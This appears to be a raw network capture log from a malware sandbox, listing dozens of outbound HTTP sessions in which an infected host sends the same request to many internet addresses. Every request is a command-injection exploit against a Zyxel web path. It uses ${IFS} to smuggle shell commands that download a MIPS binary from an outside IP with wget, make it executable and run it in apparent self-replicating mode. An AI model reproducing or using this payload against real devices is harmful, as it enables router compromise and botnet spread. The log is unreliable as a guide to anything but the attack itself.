                                              Jan 29, 2024 07:03:42.866250038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2626192.168.2.1459010217.124.201.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866298914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2627192.168.2.1437170114.168.10.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866328955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2628192.168.2.14411725.52.171.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866379976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2629192.168.2.143283072.191.57.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866416931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2630192.168.2.1438408131.246.3.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866440058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2631192.168.2.144675818.22.225.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866478920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2632192.168.2.1459468159.57.67.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866528034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2633192.168.2.1438762113.87.31.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866575003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2634192.168.2.1443224171.88.118.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866620064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2635192.168.2.1457038205.154.71.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866662979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2636192.168.2.145487275.101.56.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866687059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2637192.168.2.1437208222.169.201.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866743088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2638192.168.2.145987623.223.187.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866750002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2639192.168.2.1436296111.156.27.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866806984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2640192.168.2.1440302184.143.159.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866849899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2641192.168.2.1444006128.163.123.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866889000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2642192.168.2.1459642192.73.24.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866919041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2643192.168.2.1437694146.62.231.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866945982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2644192.168.2.1453138177.208.58.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866986036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2645192.168.2.1438098120.91.183.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867018938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2646192.168.2.1438060223.152.182.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867043972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2647192.168.2.1438706135.185.150.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867074013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2648192.168.2.145977299.59.177.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867106915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2649192.168.2.143874661.4.183.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867178917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2650192.168.2.1448448125.35.41.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867214918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2651192.168.2.144923087.153.125.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867253065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2652192.168.2.145208085.168.59.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867306948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2653192.168.2.143501460.255.125.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867330074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2654192.168.2.145409875.133.119.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867362976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2655192.168.2.1458524143.61.221.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867388964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2656192.168.2.14603848.200.14.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867422104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2657192.168.2.1454540205.190.187.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867451906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2658192.168.2.143381092.147.78.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867503881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2659192.168.2.143433076.114.170.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867522955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2660192.168.2.1452852193.148.205.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867567062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2661192.168.2.144610057.31.220.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867598057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2662192.168.2.1433532191.53.245.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867631912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2663192.168.2.143766883.168.68.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867670059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2664192.168.2.1459540116.158.29.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867697954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2665192.168.2.1458334220.74.1.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867722988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2666192.168.2.1436158103.188.130.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867779970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2667192.168.2.143695292.136.108.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867824078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2668192.168.2.143808257.110.54.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867873907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2669192.168.2.144946438.167.255.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867908001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2670192.168.2.144160025.116.220.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867948055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2671192.168.2.1445830146.7.74.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.867974043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2672192.168.2.143515874.215.14.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868021965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2673192.168.2.1436314113.5.132.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868065119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2674192.168.2.144309881.45.67.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868088007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2675192.168.2.143576839.211.237.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868144989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2676192.168.2.1446102111.164.140.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868160009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2677192.168.2.1437656106.78.181.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868216991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2678192.168.2.1443730201.128.204.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868258953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2679192.168.2.143494053.239.148.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868313074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2680192.168.2.1449386171.204.83.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868333101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2681192.168.2.1437278160.82.119.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868360996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2682192.168.2.144329045.221.25.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868419886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2683192.168.2.144532690.37.10.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868460894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2684192.168.2.145337483.203.59.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868484974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2685192.168.2.1435006184.222.218.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868519068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2686192.168.2.1452488195.50.67.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868565083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2687192.168.2.1460188110.16.3.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868590117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2688192.168.2.1434526218.211.161.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868638992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2689192.168.2.145631898.71.83.81443
                                              TimestampBytes transferredDirectionData
